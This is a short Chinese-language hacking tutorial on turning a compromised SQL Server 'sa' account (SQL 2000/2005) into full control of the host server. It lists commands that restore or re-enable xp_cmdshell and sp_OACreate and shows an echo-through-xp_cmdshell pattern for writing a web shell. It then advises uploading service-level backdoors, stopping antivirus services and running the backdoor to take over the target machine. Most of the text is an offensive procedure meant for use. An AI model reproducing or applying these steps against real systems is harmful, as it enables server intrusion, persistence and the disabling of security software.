SQL 2000 / SQL 2005 数据库

　　当你得到了SA权限时,有些人会说拿不了服务器的最大权限, 看来会不会是长相问题?

　　分析如下:

　　ConnString :

　　server=IP;UID=sa;PWD=password;database=master;Provider=SQLOLEDB

　　很多时候可能会遇到删除了'sp_OACreate' 'xp_cmdshell'

　　可以用下面的方法尝试恢复添加

　　SQL2000:

　　Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')

　　Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')

　　SQL2005:

　　exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

　　EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

　　在这里,传说中的SQL2005安全性比较高的,在SA权限下显得更加没了地位了!

　　好了,添加好了这些. 此时就真的要看你的长相了..

　　利用什么方法上传自己的SHELL呢? 网上的方法也一大把.

　　我这里提供一个比较简单的方法:

　　echo写入SEHLL

　　格式如下:

　　Exec master.dbo.xp_cmdshell 'echo 代码 > name.txt'

　　这个可要自由发挥了...

　　关于如何找路径,那些就不说了,实在是没点技术含量了.

　　上传了SHELL,接下来操作就会顺利一点. 传一些服务级后门之类的.

　　再次通过xp_cmdshell 运行后门.

　　此时你会遇到很多问题,比如你的后门会不会被杀? 服务器安装了什么杀软? 这些都是小问题,完全可以通过相关的命令让那些阻挠你的软件去死.

　　DOS命令,会吧? 直接STOP那些服务就OK了!最后运行后门,进入你的目标主机!